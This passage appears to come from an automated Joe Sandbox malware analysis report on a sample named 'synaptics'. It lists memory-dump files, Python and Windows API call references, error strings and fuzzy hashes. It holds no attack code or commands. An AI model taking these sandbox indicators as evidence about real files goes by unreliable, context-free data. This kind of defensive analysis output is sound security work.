                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallCheckFunctionMakeObject_ResultState_SubtypeThreadType_
                                                                                                                                                                                                              • String ID: has no _stginfo_
                                                                                                                                                                                                              • API String ID: 4250817624-2912685656
                                                                                                                                                                                                              • Opcode ID: da0df575bfff3a91af1eecb49015ceb808721489900c2ad89b5f00ef64bd8505
                                                                                                                                                                                                              • Instruction ID: 222766daec3f3ebeaf655e7243733297fff9ca5aec84fee2de78619f1db041ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da0df575bfff3a91af1eecb49015ceb808721489900c2ad89b5f00ef64bd8505
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEC15874B0120A9FDB08CF99C481B99BBF5FF49318F2482A9E819EB751D731E951CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8220D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82215
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8221D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82225
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8222D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82233
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82243
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8224C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82255
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8225E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: c26712a89e4b7322702e5aab78e20f1627b160437f59727b1633c8d1b1f4f0e8
                                                                                                                                                                                                              • Instruction ID: 785ccb0cb69ade5f3ee7b2c1eae5cda327d2a7250d4e1f5740f8b545ad715fb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c26712a89e4b7322702e5aab78e20f1627b160437f59727b1633c8d1b1f4f0e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A30144B2984100ABEA115B14FC8254FB7B1EF40234F044574EC4E11271D63FF93EA6A7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8220D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82215
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8221D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82225
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8222D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82233
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82243
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8224C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82255
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8225E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 8976b8daf3b9457c2576bd1f60d90abe7aa41f55047161171f9782138bd2f9d2
                                                                                                                                                                                                              • Instruction ID: f362f5c1cef6c95899717a1a857a7454da8cadba8b04f88c39d000218d89ce13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8976b8daf3b9457c2576bd1f60d90abe7aa41f55047161171f9782138bd2f9d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0F4B1584100ABEA115B21FC8258B77B1EF40235F044575EC4E10670D63FF93E76A7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8220D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82215
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8221D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82225
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8222D
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82233
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82243
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8224C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82255
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8225E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 7be3842965f79dfef901c6c53da9fd4b3f6b6cdea0af0faeb5438119f13f0908
                                                                                                                                                                                                              • Instruction ID: 90bfd958ddfc67c5275a6ed9bcd2b761c462e00fe653d7c300835b1ef7dcaf0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7be3842965f79dfef901c6c53da9fd4b3f6b6cdea0af0faeb5438119f13f0908
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3F0B2B298450057E6115B21FC8248BBB61DF50635F080579EC4A50671E61FFA3F7AA7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310 ref: 6C0A590B
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000), ref: 6C0A5919
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310 ref: 6C0A592F
                                                                                                                                                                                                              • _PyUnicode_FromId.PYTHON310(6C0B65D8), ref: 6C0A5989
                                                                                                                                                                                                              • PyObject_VectorcallMethod.PYTHON310(00000000,?,80000001,00000000), ref: 6C0A59A2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310 ref: 6C0A5A22
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$FromMethodObject_Tuple_Unicode_Vectorcall
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1207337875-3916222277
                                                                                                                                                                                                              • Opcode ID: 36901e90052987f2b8d7208df120ec9a1187ed8fc8cb7e35b23c78393609d282
                                                                                                                                                                                                              • Instruction ID: 0d00574ba59acae8c10602d4277043f9f531d05e440ab78be2d7ff00a12feade
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36901e90052987f2b8d7208df120ec9a1187ed8fc8cb7e35b23c78393609d282
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F41F475E056068BDB04CFD8D88179EB3F4FF40338F24462AE829A7641D731D9128B85
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0A4C6D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 6C0A4C77
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A4C80
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0A4D10
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?), ref: 6C0A4D1C
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A4D25
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Eval_Thread$AddressProcRestoreSave
                                                                                                                                                                                                              • String ID: _%s@%d
                                                                                                                                                                                                              • API String ID: 3891785006-3993455841
                                                                                                                                                                                                              • Opcode ID: cf920bd62029f3f2afaf8519ccb8969f285dee4b743c2f98eef8a2dfbcbf350d
                                                                                                                                                                                                              • Instruction ID: d6bc876693ce2b9e95a52f817a8d1b117033f9944ad1b03fb3dd58371bd6b90c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf920bd62029f3f2afaf8519ccb8969f285dee4b743c2f98eef8a2dfbcbf350d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5431E676F04104ABCF00CFE9D9447EEB7F9EF89218F0441A9D91A97603DF31A9068780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_AsUTF8.PYTHON310(?), ref: 6BF458F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unicode_
                                                                                                                                                                                                              • String ID: Internal$InternalHigh$hEvent
                                                                                                                                                                                                              • API String ID: 2646675794-1769053571
                                                                                                                                                                                                              • Opcode ID: 952d101a995d43b69a29d96f00124b1168fb64b6e3f355079339598ba1f7e065
                                                                                                                                                                                                              • Instruction ID: fbfc2a64a8770e5df2db7c5e2cc2386c74561c48c6573c30fc75853fd973099e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 952d101a995d43b69a29d96f00124b1168fb64b6e3f355079339598ba1f7e065
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB318F73A6D1815BD7026B349861666BFB26E5737878C44E4EAC98B233E32BC458C700
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A2255
                                                                                                                                                                                                              • _PyDict_SetItemId.PYTHON310(?,6C0B681C,?), ref: 6C0A2265
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,_type_ must be a type), ref: 6C0A2291
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A22AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$DeallocDict_Item
                                                                                                                                                                                                              • String ID: _type_ must be a type$_type_ must have storage info$abstract class
                                                                                                                                                                                                              • API String ID: 3638012535-3623708933
                                                                                                                                                                                                              • Opcode ID: 4c661f99e7910c87b8f9ea7946e090eadd082a0171cdc1ea1cea921a98c676d6
                                                                                                                                                                                                              • Instruction ID: fa901952039815438ff290a1d5a162400978aadb3bf686e9025920894f50079c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c661f99e7910c87b8f9ea7946e090eadd082a0171cdc1ea1cea921a98c676d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2221F671605501AFCB00CFDAD909B8577F8FF42729B104521EA1DA3D12C732E416CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,HANDLE must be a PyHKEY), ref: 6BF44B95
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,6BF59E28), ref: 6BF44BB2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6BF44BC4
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(RegCloseKey,00000000), ref: 6BF44BDB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U_object@@$CloseErr_Error@@Object_StringWin_
                                                                                                                                                                                                              • String ID: HANDLE must be a PyHKEY$PyHKEY$RegCloseKey
                                                                                                                                                                                                              • API String ID: 2805645888-2645764861
                                                                                                                                                                                                              • Opcode ID: 5a2e7af5ff1f84bb78b22004d9dbe1d969ecd7de713f5e9c25c760a0d8898763
                                                                                                                                                                                                              • Instruction ID: 5a73b7447a242ad28eede2003acb438b7c8c896d2e4f2efe0023a4f9a11e6998
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a2e7af5ff1f84bb78b22004d9dbe1d969ecd7de713f5e9c25c760a0d8898763
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C811E377B182019FD7009F34E824B9B7FE5EF9525A70984E4E848E7233EB69C9188760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000), ref: 6BF41FEA
                                                                                                                                                                                                              • PyArg_ParseTupleAndKeywords.PYTHON310(00000000,00000000,lllO,6BF5901C,?,?,00000000,?), ref: 6BF4200C
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF4201E
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}), ref: 6BF42037
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF42056
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • lllO, xrefs: 6BF42005
                                                                                                                                                                                                              • EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 6BF42030
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                              • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$lllO
                                                                                                                                                                                                              • API String ID: 959004690-1584370844
                                                                                                                                                                                                              • Opcode ID: 8a46c376d3016a074f48735b3e9e67830e39c607b7080ddfb7e7873890421f9b
                                                                                                                                                                                                              • Instruction ID: 1d87fdc219647700e018b883bdd398bbd8ff1b5ae9f68122f5a27e7efe41553f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a46c376d3016a074f48735b3e9e67830e39c607b7080ddfb7e7873890421f9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C1108739242126BD304DF28DC44A97BFA4EF55235F004335F51981173EB659AA9C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsUnsignedLongMask.PYTHON310(?), ref: 6C0AD43A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • unicode string or integer address expected instead of %s instance, xrefs: 6C0AD461
                                                                                                                                                                                                              • _ctypes/cfield.c pymem, xrefs: 6C0AD48F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongLong_MaskUnsigned
                                                                                                                                                                                                              • String ID: _ctypes/cfield.c pymem$unicode string or integer address expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 2866502472-901310697
                                                                                                                                                                                                              • Opcode ID: a71c1d5804553998a43d2da62fad61d9535ace90f79fa952bbfe6b9508da4fa9
                                                                                                                                                                                                              • Instruction ID: 8e1b2c4c7a0c1979d647f6a6f99536fe416c8b6c906889eac1f0c41cd5bee34a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a71c1d5804553998a43d2da62fad61d9535ace90f79fa952bbfe6b9508da4fa9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7119AB03042089FCF08CFA4EA88B9937F8EB46318F048064FD0E97601DB36E915CA88
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsLongLong.PYTHON310(?), ref: 6BF453E3
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF453FC
                                                                                                                                                                                                              • PyErr_WarnEx.PYTHON310(6C7EC804,Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead,00000001), ref: 6BF45419
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,6BF4FC00,?,?), ref: 6BF4542F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,LARGE_INTEGER must be 'int', or '(int, int)'), ref: 6BF45448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • LARGE_INTEGER must be 'int', or '(int, int)', xrefs: 6BF45441
                                                                                                                                                                                                              • Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 6BF45412
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Long$Arg_Long_OccurredParseStringTupleWarn
                                                                                                                                                                                                              • String ID: LARGE_INTEGER must be 'int', or '(int, int)'$Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead
                                                                                                                                                                                                              • API String ID: 3944559157-3919795897
                                                                                                                                                                                                              • Opcode ID: 7e975df3ecbc5f74ba2f39ba929d55acfed66a9b861729938af5c2f2f564dd96
                                                                                                                                                                                                              • Instruction ID: fd669a06c14c7103a3714a615f6251ffd7c5920828d9b2a8410e580f81437ed2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e975df3ecbc5f74ba2f39ba929d55acfed66a9b861729938af5c2f2f564dd96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6211E3736212019FD705EF68CC04B9ABBE8EF95315F1088A9F519C7272D735D419CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,|i:FormatError,?), ref: 6C0AA8A7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0AA8BF
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(00000000,-00000002), ref: 6C0AA8F1
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C0AA8FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
                                                                                                                                                                                                              • String ID: <no description>$|i:FormatError
                                                                                                                                                                                                              • API String ID: 935104296-1632374824
                                                                                                                                                                                                              • Opcode ID: 7547db81ebfca5d78efbba79e44ca7a11e2ee7cb85afc5d8866285d85a240569
                                                                                                                                                                                                              • Instruction ID: 30be5828e10852f76088deb5d9e28c9007ea01269c1e4678fdb43bdbb4a387de
